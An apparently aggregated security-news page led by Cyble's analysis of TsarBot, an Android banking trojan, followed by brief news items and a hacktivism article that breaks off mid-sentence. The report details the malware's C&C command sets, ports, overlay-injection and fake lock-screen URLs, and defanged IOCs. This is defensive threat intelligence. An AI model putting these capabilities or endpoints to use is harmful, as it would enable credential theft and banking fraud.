Key Takeaways A new Android Banking Trojan, TsarBot, targets over 750 applications globally, including banking, finance, cryptocurrency, and e-commerce apps. TsarBot spreads via phishing sites masquerading as legitimate financial platforms and is installed through a dropper disguised as Google Play Services. It uses overlay attacks to steal banking credentials, credit card details, and login credentials by displaying fake login pages over legitimate apps. TsarBot can record and remotely control the screen, executing fraud by simulating user actions such as swiping, tapping, and entering credentials while hiding malicious activities using a black overlay screen. It captures device lock credentials using a fake lock screen to gain full control. TsarBot communicates with its C&C server using WebSocket across multiple ports to receive commands, send stolen data, and dynamically execute on-device fraud. Overview Cyble Research and Intelligence Labs (CRIL) discovered a new Android banking trojan that uses an overlay attack to target over 750 applications, including banking, finance, cryptocurrency, payment, social media, and e-commerce applications, across multiple regions. While the malware mainly utilizes overlay attacks to steal credentials, it also carries out various other malicious actions. It is capable of recording and remotely controlling the screen, enabling attackers to monitor and manipulate the device. Additionally, it employs lock-grabbing techniques, keylogging, and intercepting SMS messages. The analyzed samples indicate the presence of a newly discovered banking trojan, which we are internally tracking as “TsarBot,” a name chosen due to the threat actor''s suspected Russian origin. During our investigation, we identified multiple log entries in Russian within the malicious application, suggesting that a Russian-speaking threat actor likely developed the malware. Figure 1 – Logs in the Russian Language TsarBot has been observed spreading through a phishing site that impersonates the official Photon Sol website. The phishing site deceptively offers a download option for an application to start trading, whereas the legitimate website lacks such an option. The following phishing sites impersonate legitimate entities and distribute dropper applications that, once installed on the targeted device, will deploy TsarBot. hxxps://solphoton[.]io hxxps://solphoton[.]app hxxps://cashraven[.]online Figure 2 – Phishing site distributing TsarBot Figure 3 - Phishing site distributing TsarBot Technical Details As previously mentioned, the phishing site delivers a dropper application that stores the TsarBot APK file, implant.apk, in the “res/raw” folder. The dropper utilizes a session-based package installer to deploy the TsarBot malware on the device. Figure 4 – Dropper installing TsarBot TsarBot conceals itself as the Google Play Service app and does not display a launcher icon. Upon installation, it presents a fake Google Play Service update page, prompting the user to enable Accessibility services. Figure 5 – Malware prompting victims to enable Accessibility services WebSocket Connection After the victim enables the Accessibility service, the malware establishes a socket connection with the C&C server ""hxxp://95.181[.]173.76"" using four different ports listed below: 9001 – To receive commands 9002 – To send captured screen content 9004 – To receive different sets of commands 9030 – To send data to the server TsarBot can receive various commands from the server, primarily focused on-screen control, enabling it to carry out on-device fraud. Command Description Command Received from 9001 Port REQUEST_CAPTURE Prompt to start screen capturing and initiates screen recording CLICK_DESCRIPTION Click on the screen containing the mentioned description CLICK_TEXT Clicks on the text present on the screen SWIPE_RIGHT Makes a swipe-right gesture TAP Taps on the screen BACK Take the user to the back screen HOME Take the user to the home screen RECENT_APPS Takes to the recent app CLICK_NEAR_TEXT Click on the button near the mentioned text CLICK_INDEX Check the clickable object on the given index and perform a click ZOOM_IN Zoom in screen TAP_COORDINATES Taps on the mentioned co-ordinates on the screen SWIPE_UP Makes swipe-up gesture SWIPE_DOWN Makes swipe-down gesture SWIPE_LEFT Makes swipe-left gesture LAUNCH_APP Launch app ZOOM_OUT Zoom out screen Commands Received from 9004 Port click_by_text Clicks on the element matching text stop_sending_tree Stops sending ketlogs swipe_up Make a swipe-up gesture tap Makes a tap gesture home Takes to the home screen hide_black_overlay Remove the black overlay from the screen swipe_down Makes a swipe-down gesture swipe_left Makes a swipe left gesture show_black_overlay Displays a black overlay on the screen swipe_right Make a swipe-right gesture recents Take to the recent screen start_sending_tree Starts sending keylogs paste_text Paste text into the edit field on the screen Screen Recording As outlined in the command table, when TsarBot receives the ""REQUEST_CAPTURE"" command, it prompts the user to enable screen capture permissions. Once granted, the malware initiates the screen capture service, transmitting the captured screen content to the C&C server via a WebSocket connection on port 9002. Figure 6 – Screen capture service By capturing screen content and executing server-issued screen control commands, TsarBot can carry out fraudulent transactions on the targeted device by concealing this fraud activity with a black overlay screen. Lock Grabber TsarBot incorporates the LockTypeDetector feature to determine the device''s lock type using the Accessibility service. It detects specific on-screen text or descriptions, such as ""PIN area,"" ""Device password,"" or a pattern, to identify the lock method. Once identified, it saves the lock type status for future use in lock-grabbing operations. Figure 7 – Lock type detection code When TsarBot receives the ""USER_PRESENT"" action for the first time, it loads a fake lock screen based on the detected lock type from ""hxxps://xdjhgfgjh[.]run/injects/htmlPIN/android.PinCode.html"" and captures the user''s lock password, PIN, or pattern. Figure 8 – Malware loading fake lock screen Overlay Attack TsarBot connects to the URL ""hxxps://xdjhgfgjh[.]run/injects/ServiceName.txt"" to retrieve a list of targeted application package names. Most of these belong to banking apps from various regions, including France, Poland, the UK, India, the UAE, and Australia. The remaining package names are associated with e-commerce, social media, messaging apps, cryptocurrency, and other categories. Figure 9 – TsarBot receiving the target application package names TsarBot collects the installed applications on the infected device and compares them against the package names received from the server, maintaining a target list for overlay attacks. Figure 10 – Malware comparing the installed application package names with the target list received from the server When the victim interacts with an application, TsarBot checks its package name against the maintained target list. If the application is found in the targeted list, it then retrieves the corresponding injection page from ""hxxps://xdjhgfgjh[.]run/injects/html/{packagename}.html"" and loads it into a WebView. Figure 11 – Creating an overlay window on top of the targeted application The injection page mimics a legitimate application, tricking users into entering sensitive information such as net banking credentials, log in details, and credit card information. The figure below shows the injection pages for one of the target applications. Figure 12 – Injection page for Indian Bank prompting to enter login and credit card details The data entered into the injection phishing pages is sent to the C&C server over port 9030. After transmitting the stolen sensitive information, TsarBot removes the targeted application''s package name from the list to prevent the overlay from being triggered again for the same app. Figure 13 – Sends collected login and credit card information from overlay activity to the C&C server Figure 14 – Removing application package name from target list The image below shows the injection pages used by TsarBot to trick the victims into submitting sensitive information while attempting to access genuine applications. Figure 15 – Injection pages for different applications Conclusion TsarBot is yet another addition to the growing list of Android banking trojans, relying on familiar yet effective tactics such as overlay attacks, screen recording, and lock grabbing. By abusing Accessibility services and WebSocket communication, it enables on-device fraud while maintaining a low profile. With its ability to target over 750 applications across multiple sectors, TsarBot underscores the persistent threat posed by banking malware. Users should exercise caution when installing apps, avoid untrusted sources, and remain vigilant against phishing sites distributing such threats. Our Recommendations We have listed some essential cybersecurity best practices that create the first line of control against attackers. We recommend that our readers follow the best practices given below: Download and install software exclusively from official application stores, such as the Google Play Store or the iOS App Store.  Utilize a reputable antivirus and internet security software package on all connected devices, including personal computers, laptops, and mobile devices.  Implement strong passwords and enforce multi-factor authentication wherever feasible.  Activate biometric security features, such as fingerprint or facial recognition, for unlocking mobile devices when available.  Exercise caution while opening links that have been sent via SMS or emails on your mobile device.  Ensure that Google Play Protect is enabled on Android devices.  Be judicious when granting permissions to applications.  Maintain updated versions of your devices, operating systems, and applications.  MITRE ATT&CK® Techniques Tactic Technique ID Procedure Initial Access (TA0027) Phishing (T1660) Malware is distributed via phishing sites Persistence (TA0028) Event-Triggered Execution: Broadcast Receivers (T1624.001) TsarBot listens for the BOOT_COMPLETED intent to automatically launch after the device restarts. Defense Evasion (TA0030) Masquerading: Match Legitimate Name or Location (T1655.001) Malware pretending to be a genuine application Defense Evasion (TA0030) Application Discovery (T1418) Collects the installed application package name list to identify the target Defense Evasion (TA0030) Hide Artifacts: Suppress Application Icon (T1628.001) Hides the application icon Defense Evasion (TA0030) Input Injection (T1516) Malware can mimic user interaction, perform clicks and various gestures, and input data Credential Access (TA0031) Input Capture: Keylogging (T1417.001) TsarBot can collect credentials via keylogging Collection (TA0035) Protected User Data: SMS Messages (T1636.004) Collects SMSs Collection (TA0035) Screen Capture (T1513) Malware records screen using Media Projection Command and Control (TA0037) Application Layer Protocol: Web Protocols (T1437.001) TsarBot uses HTTP to communicate with the C&C server Exfiltration (TA0036) Exfiltration Over C2 Channel (T1646) Sending exfiltrated data over C&C server Indicators of Compromise (IOCs) Indicators Indicator Type Description 13c30f24504cb83c8f90747a51aebc0f8fb7ed8c41fb87419b7300376cfbd7f2 1a41ae507d6f67385e2e10f106cedf80632f1eb42b864e722ad4c2e0d2b91aca 291f807cc1d9a26a04da128f3de6d136fd0974a66c38694d0559ca884bd0d359 2c4574fb07eb254e845eb86f76d8e353d13d671ba71b6e79c1e55485664d666c SHA256 Dropper file hashes 8d2e3f46c71ba5f3dcb4e7a0359693765bf4d8e0152ad82906c42d9f7573c88f 73a6ae8331cd01dd59b8c526df2a90771dcf9d74048dc7ea51d75a3beacbd95b 0e8569ec252caf58f72c43358472f22786cd32685d23c882b4b2e38409cf2e47 957df5b8998780c50ee630ad70926bdd4ee83748ee89c3a7916e8eace9b95d88 SHA256 TsarBot hxxps://cashraven[.]online/hxxps://solphoton[.]app/ hxxps://solphoton[.]io/ URL Phishing sites hxxps://solphoton[.]io/PhotonSol.apk hxxps://cashraven[.]online/CashRaven.apk URL Malware distribution URLs 95.181.173[.]76 IP C&C server hxxps://xdjhgfgjh[.]run/injects/ServiceName[.]txt hxxps://xdjhgfgjh[.]run/injects/html/ hxxps://xdjhgfgjh[.]run/injects/htmlPIN/android[.]Passcode[.]html hxxps://xdjhgfgjh[.]run/injects/htmlPIN/android[.]Pattern[.]html hxxps://xdjhgfgjh[.]run/injects/htmlPIN/android[.]PinCode[.]html URL URL hosting injections The post TsarBot: A New Android Banking Trojan Targeting Over 750 Banking, Finance, and Cryptocurrency Applications appeared first on Cyble.

by CYBLE

The bug fix comes days after Google fixed a similar vulnerability under attack in its Chrome browser.

by TechCrunch

As evidence continues to pile up, security providers warn customers to secure networks.

by Cybersecurity Dive

The comments follow actions taken by President Trump that have effectively upended the U.S. approach to AI policy under Biden, according to analysts.

by Cybersecurity Dive

Cybersecurity researchers have discovered several cryptocurrency packages on the npm registry that have been hijacked to siphon sensitive information such as environment variables from compromised systems. ""Some of these packages have lived on npmjs.com for over 9 years, and provide legitimate functionality to blockchain developers,"" Sonatype researcher Ax Sharma said. ""However, [...] the latest

by The Hacker News

The rise of DeepSeek has prompted the usual well-documented concerns around AI, but also raised worries about its potential links to the Chinese state. The Security Think Tank considers the steps security leaders can take to counter threats posed by nation state industrial espionage?

by ComputerWeekly

COBOL remains a major obstacle to digital transformation. As AI revolutionizes software development, can it finally conquer COBOL''s complexities and modernize legacy systems?

by ITPro Today

Mozilla has released updates to address a critical security flaw impacting its Firefox browser for Windows, merely days after Google patched a similar flaw in Chrome that came under active exploitation as a zero-day. The security vulnerability, CVE-2025-2857, has been described as a case of an incorrect handle that could lead to a sandbox escape. ""Following the recent Chrome sandbox escape (

by The Hacker News

Open source software may be free to use, but creating and maintaining it often incurs significant costs. Here are four approaches to paying for open source software development.

by ITPro Today

Cisco Talos is actively tracking an ongoing campaign, targeting users in Ukraine with malicious LNK files which run a PowerShell downloader since at least November 2024.

by Cisco Talos Blog

Fortresses of Old and New: From Medieval Castle Sieges to Modern-Day Cyber Attacks Is cybersecurity as complex as it seems? As CEO of BlockAPT, I have often found that cybersecurity is perceived as overwhelmingly complex. The sheer volume of tools, terminology, and evolving threats can make it seem impenetrable to those who aren’t technical experts. […] The post Fortresses of Old and New: From Medieval Castle Sieges to Modern-Day Cyber Attacks first appeared on BlockAPT.

by BlockAPT

Check out NIST’s comprehensive taxonomy of cyberattacks against AI systems, along with mitigation recommendations. Plus, organizations have another cryptographic algorithm for protecting data against future quantum attacks. And get the latest on the IngressNightmare vulnerabilities, and on cyber risks impacting commercial satellites and domain registrars.Dive into five things that are top of mind for the week ending March 28.1 - NIST categorizes attacks against AI systems, offers mitigationsOrganizations deploying artificial intelligence (AI) systems must be prepared to defend them against cyberattacks — not a simple task.Recognizing this challenge, the U.S. government this week published a report to help organizations identify, address and manage cyber risks faced by AI systems.Titled “Adversarial Machine Learning: A Taxonomy and Terminology of Attacks and Mitigations (NIST AI 100-2)” and published by the U.S. National Institute of Standards and Technology, the 127-page report also offers:A taxonomy of adversarial machine-learning (AML) attacks, such as evasion, poisoning, and privacy attacks against both predictive AI systems and generative AI systems; and of AML attacks targeting learning methodsPotential mitigations against AML attacks, as well as the limitations of these mitigationsStandardized AML terminology, along with an index and a glossary“Despite the significant progress of AI and machine learning in different application domains, these technologies remain vulnerable to attacks,” reads a NIST statement. “The consequences of attacks become more dire when systems depend on high-stakes domains and are subjected to adversarial attacks.”For example, to mitigate supply chain attacks against generative AI systems, NIST recommendations include:Verify that data downloaded from the web for training AI models hasn’t been tampered with: Do a basic integrity check in which the data provider publishes cryptographic hashes and the downloader verifies the training data.Perform data filtering to try to remove poisoned data samples.Do vulnerability scans of model artifacts.Use mechanistic interpretability methods to identify backdoor features.Design generative AI applications in such a way as to reduce the impact of model attacks.Taxonomy of Attacks on GenAI Systems(Source: “Adversarial Machine Learning: A Taxonomy and Terminology of Attacks and Mitigations” report from NIST, March 2025)The report is primarily aimed at those in charge of designing, developing, deploying, evaluating and governing AI systems.For more information about protecting AI systems against cyberattacks:“Understanding the risks - and benefits - of using AI tools” (U.K. NCSC)“Hacking Poses Risks for Artificial Intelligence” (Georgetown University)“Attacking Artificial Intelligence: AI’s Security Vulnerability and What Policymakers Can Do About It” (Harvard University)“How Safe and Secure Is GenAI Really?” (InformationWeek)“Hacking AI? Here are 4 common attacks on AI” (ZDNet)“Adversarial attacks on AI models are rising: what should you do now?” (VentureBeat)2 - ETSI releases new post-quantum cryptographic standardAnd the world has yet another cryptographic algorithm standard designed to protect data against future attacks powered by mighty quantum computers.Called Covercrypt, the quantum-resistant standard specification secures data not only against forthcoming quantum attacks, but also against current pre-quantum attacks, the European Telecommunications Standards Institute (ETSI) announced this week.Specifically, Covercrypt defines a scheme for key encapsulation mechanisms with access control (KEMAC) in which session keys are locked based on users’ attributes. “For instance, while an IT department can define who enters applications, the ETSI KEMAC standard helps to determine who can decrypt the data inside those applications through a specific access policy,” reads an ETSI statement. To get more details, check out ETSI’s Covercrypt technical specification.Earlier this month, NIST picked its fifth algorithm for post-quantum encryption, which it expects will be widely available for use in 2027. NIST released three quantum-resistant algorithm standards last year and expects to release a fourth one in 2026.Here’s the issue: Quantum computers, which are expected to become widely available at some point between 2030 and 2040, will be able to decrypt data protected with today’s public-key cryptographic algorithms. Consequently, organizations need to start migrating to post-quantum cryptography, a process that requires careful planning and deployment.To help organizations plan their migration to quantum-resistant cryptography, this month NIST published a draft white paper titled “Considerations for Achieving Crypto Agility,” while the U.K. National Cyber Security Centre (NCSC) released “Timelines for migration to post-quantum (PQC) cryptography.” For more information about how to protect your organization against the quantum computing cyberthreat:“How to prepare for a secure post-quantum future” (TechTarget)“Moody’s sounds alarm on quantum computing risk, as transition to PQC ‘will be long and costly’” (Industrial Cyber)“Companies Prepare to Fight Quantum Hackers” (The Wall Street Journal)“US unveils new tools to withstand encryption-breaking quantum. Here''s what experts are saying” (World Economic Forum)“Quantum is coming — and bringing new cybersecurity threats with it” (KPMG)“Quantum and the Threat to Encryption” (SecurityWeek)3 - U.K.’s NCSC urges domain registrars to shore up securityLax security practices among domain registrars and domain-name system (DNS) operators help cyber fraudsters carry out online scams, including phishing campaigns.For that reason, it’s critical that domain sellers and owners tighten their security practices, the U.K. National Cyber Security Centre (NCSC) warned this week.“To enable phishing in the first place, malicious actors rely on obtaining misleading and fraudulent domains, or taking over legitimate domain names at scale,” reads the new NCSC guidance “Good security practice for domain registrars.” The guidance is aimed at registrars that sell domains at scale, as well as at organizations that buy and park domains as investments or as part of brand-protection efforts.The NCSC’s security recommendations include:Verify the customer’s information, such as IP address, email address, phone number and payment information; and check it against available threat intelligence.Use a system that automatically flags misleading domain-name registrations that aim to deceptively align themselves with well-known brands.Make it difficult for attackers to tamper with and hijack domains by adopting security controls like multi-factor authentication and automated domain-change notifications.For more information about DNS security:“How To Reduce DNS Infrastructure Risk To Secure Your Cloud Attack Surface” (Tenable)“What is DNS Cache Poisoning?” (TechTarget)“10 Dangerous DNS Attacks Types & Prevention Measures” (Cybersecurity News)“Attackers target the Domain Name System, the internet’s phone book. Here’s how to fight back” (SiliconAngle)“The 5 big DNS attacks and how to mitigate them” (Network World)4 - ENISA: Commercial satellites need better cyber protectionsMakers of commercial satellites face critical cyberthreats from a variety of attackers, including hacktivists, nation-state actors and cybercriminals, so they need to boost their cyber defenses.That’s according to the European Union Agency for Cybersecurity (ENISA), which this week published “Space Threat Landscape,” a report that recommends cybersecurity controls and cyberattack mitigations to space-sector organizations.“The commercial exploitation of space has become the backbone of key economic activities. Digital threats in space are therefore highly critical. … This is why commercial satellites must be cyber secured at all cost,” Juhan Lepassaar, ENISA’s Executive Director, said in a statement.Services provided by commercial satellites include telecommunications, financial transactions, television broadcasts, GPS navigation, weather monitoring and more, which is why breaches impacting them in recent years have been highly disruptive.Cybersecurity challenges faced by commercial satellite makers include:Risk to their supply chains, which are global and highly complexWidespread use of commercial off-the-shelf componentsPrevalence of legacy systems and limited IT asset visibility, both aggravated by the remote location of space systemsWeak configurations, particularly due to insufficient use of cyrptographyHuman error, magnified by the need for significant human interaction with space systemsThreat of sophisticated cyberattacksENISA’s mitigation recommendations include:Bake security into the design of systems and networks.Regularly patch software vulnerabilities, prioritizing the ones that pose the greater risk to your organization.Share information about vulnerabilities, threats and attack tactics, techniques and procedures with your industry peers.Secure your supply chain by carefully and methodically vetting vendors and partners; and by continuously monitoring their security processes. Be aware of fraudulent equipment circulating in the global supply chain.Rigorously test the security of commercial off-the-shelf products and components.Adopt “effective, validated and tested” encryption methods to protect your systems and data.For more information about the cybersecurity of commercial satellites:“We Need Cybersecurity in Space to Protect Satellites” (Scientific American)“Orbital observations: Enhancing space resilience with real-time cybersecurity” (Deloitte)“The Growing Risk of a Major Satellite Cyber Attack” (Via Satellite)“Recommendations to Space System Operators for Improving Cybersecurity” (CISA)“A Cybersecurity Framework for Mitigating Risks to Satellite Systems” (Dark Reading)5 - New vulns disclosed, patched for Ingress NGINX Controller for KubernetesDoes your organization use the Ingress NGINX Controller for Kubernetes? If so, your IT and cybersecurity departments are hopefully aware of five vulnerabilities disclosed this week affecting this popular open-source controller used for managing Kubernetes clusters’ network traffic. One vulnerability has a “critical” severity rating, while three are rated “high.” The Kubernetes open source project fixed all of the vulnerabilities — collectively known as IngressNightmare — with the release of two new versions of the product: Ingress NGINX Controller 1.12.1, which fixes version 1.12.0; and Ingress NGINX Controller 1.11.5, which fixes older versions, starting with 1.11.4.To get all the details, check out Tenable Research’s blog “CVE-2025-1097, CVE-2025-1098, CVE-2025-1974, CVE-2025-24513, CVE-2025-24514: Frequently Asked Questions About IngressNightmare.”

by Tenable

The nRootTag attack leverages the Apple network to track other vendors' Android, Windows and Linux devices. Learn how this is possible and how to protect yourself from the attack.

by Kaspersky

A malevolent mutation of the widely used nginx web server facilitates Adversary-in-the-Middle action, but there’s hope

by Sophos News

The Islamic Republic is keeping its enemies close and its friends closer, with espionage attacks aimed at nearby neighbors.

by Dark Reading

by CrowdStrike

Progress Telerik Report Server 2024 Q1 (10.0.24.305) - Authentication Bypass

by Exploit DB

Rejetto HTTP File Server 2.3m - Remote Code Execution (RCE)

by Exploit DB

Sonatype Nexus Repository 3.53.0-01 - Path Traversal

by Exploit DB

CodeCanyon RISE CRM 3.7.0 - SQL Injection

by Exploit DB

Litespeed Cache 6.5.0.1 - Authentication Bypass

by Exploit DB

Learn about CVE-2025-24813 affecting Apache Tomcat products. Patch now to prevent remote code execution.

by Recorded Future

<p>1.1      IntroductionAgents and Large Language Models (LLMs) offer a powerful combination for driving automation. In this post, we’ll explore how to implement a straightforward agent that leverages the capabilities of…</p>

by TrustedSec

Cybersecurity researchers have shed light on a new phishing-as-a-service (PhaaS) platform that leverages the Domain Name System (DNS) mail exchange (MX) records to serve fake login pages that impersonate about 114 brands. DNS intelligence firm Infoblox is tracking the actor behind the PhaaS, the phishing kit, and the related activity under the moniker Morphing Meerkat. ""The threat actor behind

by The Hacker News

WIRED has found four new Venmo accounts that appear to be associated with Trump officials who were in an infamous Signal chat. One made a payment with a note consisting solely of an eggplant emoji.

by WIRED Security News

Dark Reading Confidential Episode 5: Christofer Hoff, chief secure technology officer at LastPass, shares the human side of the story of how he led his team through a major cyber incident and built from the ground up a security team and security culture.

by Dark Reading

INKY has published its annual report on email security, finding that phishing accounted for 30% of all reported cybercrimes last year.

by KnowBe4

Also ranked the top solution across 53 global reports.

by Sophos News

State and federal security experts weighed in on the impact that budgetary and personnel cuts to CISA will have on election security as a whole.

by Dark Reading

The artificial intelligence research company previously had its maximum payout set at $20,000 before exponentially raising the reward.

by Dark Reading

A new analysis has uncovered connections between affiliates of RansomHub and other ransomware groups like Medusa, BianLian, and Play. The connection stems from the use of a custom tool that''s designed to disable endpoint detection and response (EDR) software on compromised hosts, according to ESET. The EDR killing tool, dubbed EDRKillShifter, was first documented as used by RansomHub actors in

by The Hacker News

This post first appeared on blog.netwrix.com and was written by Jonathan Blackwell.Grep (Global Regular Expression print) command is a powerful text searching utility in Unix/Linux systems. Grep takes a pattern such as a regular expression or string and searches one or more input files for the lines that contain the expected pattern. Grep command can be significantly used for text searching and filtering, log analysis, code … Continued

by Netwrix

Scandal surrounding the Trump administration’s Signal group chat has led to a landmark week for the encrypted messaging app’s adoption—its “largest US growth moment by a massive margin.”

by WIRED Security News

In this blog post, Joe covers the very basics of money laundering, how it facilitates ransomware cartels, and what the regulatory future holds for cybercrime.

by Cisco Talos Blog

An advanced persistent threat (APT) group with ties to Pakistan has been attributed to the creation of a fake website masquerading as India''s public sector postal system as part of a campaign designed to infect both Windows and Android users in the country. Cybersecurity company CYFIRMA has attributed the campaign with medium confidence to a threat actor called APT36, which is also known as

by The Hacker News

“Fullz” is a slang term used by cybercriminals trading in stolen data. It refers to data packages that contain full sets of data needed to steal someone’s identity.

by Barracuda

Whether it’s CRMs, project management tools, payment processors, or lead management tools - your workforce is using SaaS applications by the pound. Organizations often rely on traditional CASB solutions for protecting against malicious access and data exfiltration, but these fall short for protecting against shadow SaaS, data damage, and more. A new report, Understanding SaaS Security Risks: Why

by The Hacker News

The union received a spoofed email that led to the loss of $6.4 million, much of it transferred to other accounts or to a cryptocurrency exchange.

by Dark Reading

Posted by Chrome Root Program, Chrome Security Team The Chrome Root Program launched in 2022 as part of Google’s ongoing commitment to upholding secure and reliable network connections in Chrome. We previously described how the Chrome Root Program keeps users safe, and described how the program is focused on promoting technologies and practices that strengthen the underlying security assurances provided by Transport Layer Security (TLS). Many of these initiatives are described on our forward looking, public roadmap named “Moving Forward, Together.” At a high-level, “Moving Forward, Together” is our vision of the future. It is non-normative and considered distinct from the requirements detailed in the Chrome Root Program Policy. It’s focused on themes that we feel are essential to further improving the Web PKI ecosystem going forward, complementing Chrome’s core principles of speed, security, stability, and simplicity. These themes include: Encouraging modern infrastructures and agility Focusing on simplicity Promoting automation Reducing mis-issuance Increasing accountability and ecosystem integrity Streamlining and improving domain validation practices Preparing for a ""post-quantum"" world Earlier this month, two “Moving Forward, Together” initiatives became required practices in the CA/Browser Forum Baseline Requirements (BRs). The CA/Browser Forum is a cross-industry group that works together to develop minimum requirements for TLS certificates. Ultimately, these new initiatives represent an improvement to the security and agility of every TLS connection relied upon by Chrome users. If you’re unfamiliar with HTTPS and certificates, see the “Introduction” of this blog post for a high-level overview. Multi-Perspective Issuance Corroboration Before issuing a certificate to a website, a Certification Authority (CA) must verify the requestor legitimately controls the domain whose name will be represented in the certificate. This process is referred to as ""domain control validation"" and there are several well-defined methods that can be used. For example, a CA can specify a random value to be placed on a website, and then perform a check to verify the value’s presence has been published by the certificate requestor. Despite the existing domain control validation requirements defined by the CA/Browser Forum, peer-reviewed research authored by the Center for Information Technology Policy (CITP) of Princeton University and others highlighted the risk of Border Gateway Protocol (BGP) attacks and prefix-hijacking resulting in fraudulently issued certificates. This risk was not merely theoretical, as it was demonstrated that attackers successfully exploited this vulnerability on numerous occasions, with just one of these attacks resulting in approximately $2 million dollars of direct losses. Multi-Perspective Issuance Corroboration (referred to as ""MPIC"") enhances existing domain control validation methods by reducing the likelihood that routing attacks can result in fraudulently issued certificates. Rather than performing domain control validation and authorization from a single geographic or routing vantage point, which an adversary could influence as demonstrated by security researchers, MPIC implementations perform the same validation from multiple geographic locations and/or Internet Service Providers. This has been observed as an effective countermeasure against ethically conducted, real-world BGP hijacks. The Chrome Root Program led a work team of ecosystem participants, which culminated in a CA/Browser Forum Ballot to require adoption of MPIC via Ballot SC-067. The ballot received unanimous support from organizations who participated in voting. Beginning March 15, 2025, CAs issuing publicly-trusted certificates must now rely on MPIC as part of their certificate issuance process. Some of these CAs are relying on the Open MPIC Project to ensure their implementations are robust and consistent with ecosystem expectations. We’d especially like to thank Henry Birge-Lee, Grace Cimaszewski, Liang Wang, Cyrill Krähenbühl, Mihir Kshirsagar, Prateek Mittal, Jennifer Rexford, and others from Princeton University for their sustained efforts in promoting meaningful web security improvements and ongoing partnership. Linting Linting refers to the automated process of analyzing X.509 certificates to detect and prevent errors, inconsistencies, and non-compliance with requirements and industry standards. Linting ensures certificates are well-formatted and include the necessary data for their intended use, such as website authentication. Linting can expose the use of weak or obsolete cryptographic algorithms and other known insecure practices, improving overall security. Linting improves interoperability and helps CAs reduce the risk of non-compliance with industry standards (e.g., CA/Browser Forum TLS Baseline Requirements). Non-compliance can result in certificates being ""mis-issued"". Detecting these issues before a certificate is in use by a site operator reduces the negative impact associated with having to correct a mis-issued certificate. There are numerous open-source linting projects in existence (e.g., certlint, pkilint, x509lint, and zlint), in addition to numerous custom linting projects maintained by members of the Web PKI ecosystem. “Meta” linters, like pkimetal, combine multiple linting tools into a single solution, offering simplicity and significant performance improvements to implementers compared to implementing multiple standalone linting solutions. Last spring, the Chrome Root Program led ecosystem-wide experiments, emphasizing the need for linting adoption due to the discovery of widespread certificate mis-issuance. We later participated in drafting CA/Browser Forum Ballot SC-075 to require adoption of certificate linting. The ballot received unanimous support from organizations who participated in voting. Beginning March 15, 2025, CAs issuing publicly-trusted certificates must now rely on linting as part of their certificate issuance process. What’s next? We recently landed an updated version of the Chrome Root Program Policy that further aligns with the goals outlined in “Moving Forward, Together.” The Chrome Root Program remains committed to proactive advancement of the Web PKI. This commitment was recently realized in practice through our proposal to sunset demonstrated weak domain control validation methods permitted by the CA/Browser Forum TLS Baseline Requirements. The weak validation methods in question are now prohibited beginning July 15, 2025. It’s essential we all work together to continually improve the Web PKI, and reduce the opportunities for risk and abuse before measurable harm can be realized. We continue to value collaboration with web security professionals and the members of the CA/Browser Forum to realize a safer Internet. Looking forward, we’re excited to explore a reimagined Web PKI and Chrome Root Program with even stronger security assurances for the web as we navigate the transition to post-quantum cryptography. We’ll have more to say about quantum-resistant PKI later this year.

by Google Security Blog

How and why we deploy artificial intelligence in our SIEM system Kaspersky Unified Monitoring and Analysis.

by Kaspersky

Many successful phishing attacks result in a financial loss or malware infection. But falling for some phishing scams, like those currently targeting Russians searching online for organizations that are fighting the Kremlin war machine, can cost you your freedom or your life.

by Krebs on Security

Does your phone number or home address show up on Google Search? Here''s what you can do about it.

by ZDNET Security

Keeper Security has unveiled its latest improvements to the Keeper WearOS app that accompanies their flagship password management solution. The upscaled app enhances security and ease for smartwatch users. The update aligns with Google’s latest Android guidelines, providing a more intuitive and streamlined experience for Android WearOS users. The Keeper WearOS app, formerly known as KeeperDNA, […] The post Keeper Unveils Latest WearOS App for Android appeared first on IT Security Guru.

by IT Security Guru

According to a Cyble report sent to clients recently, France is increasingly becoming a target of hacktivists for its active role in international diplomacy and in ongoing conflicts in Ukraine and the Middle East. France’s role in those conflicts “has drawn the ire of pro-Russian and pro-Palestinian hacktivist groups,” Cyble said, as those hacktivists have found ideological alignment and a common adversary in France. The attacks have ranged from Distributed Denial-of-Service (DDoS) attacks against French government institutions and other critical infrastructure to attacks against Industrial Control Systems (ICS), with the goal of disrupting essential services, influencing public opinion, and creating political pressure. Hacktivist Alliance Began with ‘Holy League’ Pro-Russian and pro-Palestinian hacktivists collaborated in the December “Holy League” attacks against French infrastructure and have picked up significantly since January, although Holy League activity against France could also be seen months earlier following the arrest in France of Telegram founder and CEO Pavel Durov. Cyble threat intelligence researchers listed 13 hacktivist groups that have been active in attacks against France this year: NoName057(16) Z-pentest Keymous+ RipperSec Sector 16 Cyber Jund (formerly Anonymous Morocco) Special Forces of the Electronic Army New Republic of Golden Falcon Team Anonymous Sudan Spider-X Rachel Hunter Mr Hamza DxPloit NoName has been the most active group, responsible for 30% of the hacktivist attacks, while Z-pentest has been the second most active group with 20% of the attacks. DDoS attacks account for 73% of the attacks, while ICS breaches account for the other 27%. Hacktivism in France Up Significantly Looking at the broadest measure of hacktivist activity – chatter on the groups’ underground channels – Cyble detected 845 mentions of activity targeting France in the first three months of 2025, up nearly 50% from the same period a year earlier. Those mentions may also include other communications, such as sharing news and offers of help in conducting cyberattacks, so that data is more a measure of interest than attack numbers. Two clusters of attacks stand out in Cyble data. At least 11 French organizations faced DDoS and ICS attacks after a March 10 government announcement of military aid to Ukraine funded by interest from frozen Russian assets, and eight of the groups were involved in organized attacks against at least 10 French targets following an early February announcement of government plans to supply Ukraine with Mirage 2000-5 fighter jets. NoName057(16), a pro-Russian group, has been “persistently targeting governmental and other sectors” since January, the Cyble report noted. Z-pentest, Golden Falcon Team and Sector 16 have primarily targeted Industrial Control Systems (ICS) in critical infrastructure environments like energy and wastewater and posted videos of members tampering with system controls, a pattern that Z-pentest, in particular, has been notably pursuing since last year. RipperSec has targeted digital services and industrial controls, while Cyber Jund (formerly Anonymous Morocco), Keymous+, Rachel Hunter, and Mr Hamza have all predominantly focused on DDoS attacks. Analysis of the attacks by the NoName057(16) reveals concentrated targeting across several key French regions. The region Île-de-France, home to Paris and many strategic economic entities experienced the highest number of incidents, highlighting the region’s strategic and symbolic value to attackers. Other regions significantly impacted include Provence-Alpes-Côte d’Azur, Grand Est, and northern and western regions such as Normandy, Pays de la Loire, and Hauts-de-France. In addition to government institutions such as local governments and key federal government offices, hacktivist groups have also been targeting critical sectors such as Energy and utilities, Banking and financial Services (BFSI), Transportation and logistics, and Telecommunications. Cyble noted that in critical infrastructure attacks, “hacktivists are leveraging illicit access 